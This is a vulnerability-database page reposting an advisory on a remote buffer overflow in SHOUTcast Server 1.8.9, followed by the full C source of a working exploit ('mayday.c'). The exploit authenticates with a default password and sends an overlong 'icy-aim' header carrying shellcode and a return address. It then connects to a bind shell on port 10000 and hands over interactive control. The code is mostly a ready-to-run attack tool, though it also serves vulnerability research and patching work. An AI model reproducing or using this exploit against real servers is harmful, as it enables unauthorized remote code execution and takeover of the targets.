Vulners
Lucene search
Nullsoft SHOUTCast 1.8.9 - Remote Buffer Overflow Vulnerability
source: http://www.securityfocus.com/bid/4934/info
Nullsoft SHOUTcast Server is used to broadcast Shoutcast music. SHOUTcast Server is available for Windows, Linux and a number of other Unix based platforms.
A remote buffer overflow vulnerability has been reported in some versions of SHOUTCast Server. An authenticated DJ may supply oversized data to the server, which will then overflow a memory buffer. Execution of arbitrary code is reported to be possible.
This vulnerability has been confirmed on SHOUTCast Server for Windows, FreeBSD and Linux. Mac OS X and Solaris may also be vulnerable, this has not however been confirmed.
/* _ ________ _____ ______
* __ ___ ____ /____.------` /_______.------.___.----` ___/____ _______
* _/ \ _ /\ __. __// ___/_ ___. /_\ /_ | _/
* ___ ._\ . \\ /__ _____/ _ / \_ | /__ | _| slc | _____ _
* - -------\______||--._____\---._______//-|__ //-.___|----._____||
* mayday.c - SHOUTcast v1.8.9 remote exploit / \ / "Never trust a DJ"
* by eSDee of Netric (www.netric.org) \/
*
* Tested on:
* - Redhat 7.x
* - Redhat 6.x
* - Suse 6.x
* - Suse 7.x
*
* More information about this bug can be found at:
* http://www.netric.org/advisories/netric-adv006.txt
*
*/
#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <getopt.h>
char shellcode[] = /* binds to port 10000 by Bighawk */
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd"
"\x80\x89\xc7\x52\x66\x68\x27\x10\x43\x66\x53\x89\xe1\x6a\x10"
"\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50"
"\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f"
"\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
"\x62\x69\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80";
int sock;
void usage();
void shell();
int
main (int argc,char *argv[])
{
char buf1[1130];
char buf2[1800];
char host[256];
char pass[256]="changeme";
int i=0;
int c=0;
int port=8001;
unsigned int ret = 0x08069687;
fprintf(stdout,"SHOUTcast v1.8.9 remote exploit by eSDee of Netric\n");
fprintf(stdout,"-----------------------------------(www.netric.org)\n");
while((c=getopt(argc,argv,"t:p:a:")) !=EOF)
{
switch(c)
{
case 'p':
port=atoi(optarg);
if ((port <= 0) || (port > 65535)) {
fprintf(stderr,"Invalid port.\n\n");
exit(1);
}
break;
case 'a':
memset(pass,0x0,sizeof(pass));
strncpy(pass,optarg,sizeof(pass) - 1);
break;
case 't':
memset(host,0x0,sizeof(host));
strncpy(host,optarg,sizeof(host) - 1);
break;
default:
usage(argv[0]);
exit(1);
break;
}
}
if (strlen(host) == 0) {
usage(argv[0]);
exit(1);
}
sock=openhost(host, port);
if (sock==-1) {
fprintf(stderr,"- Unable to connect.\n\n");
exit(1);
}
write(sock, pass, strlen(pass));
write(sock, "\n", 1);
memset(buf2, 0x0, sizeof(buf2));
memset(buf1, 0x90, sizeof(buf1));
for(i=0;i < strlen(shellcode); i++) buf1[i+600] = shellcode[i];
buf1[759] = (ret & 0x000000ff);
buf1[760] = (ret & 0x0000ff00) >> 8;
buf1[761] = (ret & 0x00ff0000) >> 16;
buf1[762] = (ret & 0xff000000) >> 24;
buf1[1120] = 0x0;
sprintf(buf2, "icy-name: netric\r\n"
"icy-aim: %s\r\n"
"\r\n", buf1);
fprintf(stdout, "Connected, sending code...\n");
fprintf(stdout, "Ret: 0x%08x\n", ret);
write(sock, buf2, strlen(buf2));
sleep(2);
close(sock);
sock=openhost(host, 10000);
if (sock==-1) {
fprintf(stderr, "Exploit failed!\n\n");
exit(1);
}
fprintf(stdout, "Exploiting succesful.\n");
fprintf(stdout, "---------------------------------------------------\n");
shell();
return 0;
}
void
usage(char *prog)
{
fprintf(stderr,"Usage: %s -t [-pa]\n",prog);
fprintf(stderr,"-t target The host to attack.\n");
fprintf(stderr,"-a password Default password is \"changeme\".\n");
fprintf(stderr,"-p port Default port is 8001.\n\n");
}
int
openhost(char *host,int port)
{
struct sockaddr_in addr;
struct hostent *he;
he=gethostbyname(host);
if (he==NULL) return -1;
sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
if (sock==-1) return -1;
memcpy(&addr.sin_addr, he->h_addr, he->h_length);
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)
sock=-1;
return sock;
}
void shell() /* taken from an old wuftp exploit */
{
fd_set fd_read;
char buff[1024], *cmd="/bin/uname -a;/usr/bin/id;\n";
int n;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
FD_SET(0, &fd_read);
send(sock, cmd, strlen(cmd), 0);
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sock, &fd_read) ) {
if((n=recv(sock,buff,sizeof(buff),0))<0){
fprintf(stderr, "EOF\n");
exit(2);
}
if(write(1,buff,n)<0)break;
}
if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<0){
fprintf(stderr,"EOF\n");
exit(2);
}
if(send(sock,buff,n,0)<0) break;
}
usleep(10);
}
fprintf(stderr,"Connection lost.\n");
exit(0);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1